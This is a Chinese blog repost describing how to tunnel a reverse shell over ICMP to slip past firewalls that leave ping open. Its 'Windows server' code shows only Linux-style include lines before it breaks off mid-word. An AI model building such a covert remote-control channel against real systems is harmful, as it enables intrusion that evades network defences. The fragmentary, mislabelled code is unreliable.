当前位置:   article > 正文

利用ICMP协议反弹shell_icmp反弹shell

icmp反弹shell

简述

网络管理员通常使用各种各样的防火墙,以拦截各类渗透测试动作,如某防火墙允许已知的机器流量在端口和服务(入口过滤),并拥有强大的出口访问控制列表的设置。然而很多时候,为了方便运维管理,在各种安全策略中,ICMP协议通常是不会过滤的,通俗点说就是不会禁PING。

ICMP(Internet Control Message Protocol)Internet控制报文协议,是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。如果在目标主机建立一个shell的管道,通过ICMP数据部分来传输协议即可实现远控过程中所需的数据交互。

服务端代码

Windows服务端:

  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <sys/types.h>
  4. #include <sys/socket.h>
  5. #include <sys/stat.h>
  6. #include <netinet/in.h>
  7. #include <netinet/ip_icmp.h>
  8. #include <netinet/ip.h>
  9. #include <string.h>
  10. #include <unistd.h>
  11. #incl
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/不正经/article/detail/470585
推荐阅读
相关标签
  

闽ICP备14008679号